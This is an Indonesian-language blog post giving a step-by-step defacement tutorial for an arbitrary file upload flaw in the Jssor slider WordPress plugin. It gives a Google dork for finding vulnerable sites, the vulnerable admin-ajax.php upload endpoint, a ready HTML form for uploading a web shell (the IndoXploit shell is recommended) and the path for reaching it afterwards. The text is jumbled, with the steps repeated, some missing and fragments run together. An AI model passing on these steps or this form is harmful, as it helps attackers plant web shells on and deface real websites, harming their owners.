Jssor Arbitary file upload Exploit Wordpres
Assalamualaikum Wr.Wb
Baiklah kembali lagi dengan saya Mr.Adewa
Pada kali ini saya akan memberikan Tutorial Deface Metode Jssor Arbitary file upload Exploit Wordpres
Sebelum itu kita harus mempersiapkan sesuatu
-Shel
Gunakan shel IndoXploit saja
-Dork
-Exploit
1. Dorking dulu di google, kreasilkan versi pikiran kalian karena poc ini susah nyari yg vuln
2. Jika sudah masukkan exploit di atas seperti ini
site.co.li/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Jiak vuln akan ada seperti ini
3. Kemudian ambil csrf di atas dan pastekan ke notepad
Masukkan target kalian di atas, jika sudah save menggunakan extensi .html
4. Buka csrf tersebut menggunakan browser. Dan upload shel kalian. Jika sukses akan ada {"jsonrpc" : "2.0", "result" : null, "id" : "id"} seperti itu lagi
5. Akses shel /wp-content/jssor-slider/jssor-uploads/nama shell.php
contoh
site.co.li /wp-content/jssor-slider/jssor-uploads/nama shell.php
Mungkin itulah sedikit penjelasan mengenai "Jssor Arbitary file upload Exploit Wordpres"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb
-Shel
Gunakan shel IndoXploit saja
-Dork
inurl:/wp-content/jssor-slider/ site:Kembangin aja agar dapat yg vuln
-Exploit
/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library-CSRF Comot sini Senpai
<html>-Akses Shel
<body>
<form action="SITE.COM/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
/wp-content/jssor-slider/jssor-uploads/nama shell.phpBaiklah langsung saja kita mulai
1. Dorking dulu di google, kreasilkan versi pikiran kalian karena poc ini susah nyari yg vuln
2. Jika sudah masukkan exploit di atas seperti ini
site.co.li/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Jiak vuln akan ada seperti ini
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
Masukkan target kalian di atas, jika sudah save menggunakan extensi .html
4. Buka csrf tersebut menggunakan browser. Dan upload shel kalian. Jika sukses akan ada {"jsonrpc" : "2.0", "result" : null, "id" : "id"} seperti itu lagi
contoh
site.co.li /wp-content/jssor-slider/jssor-uploads/nama shell.php
Mungkin itulah sedikit penjelasan mengenai "Jssor Arbitary file upload Exploit Wordpres"
Jika kurang paham kalian bisa bertanya di bawah ini
Jika kurang paham nonton aja video di bawah ini
Sekian dan Terimakasih
Segala sesuatu di tanggung sendiri, blog ini di buat untuk belajar bersama
Wassalamualaikum Wr.Wb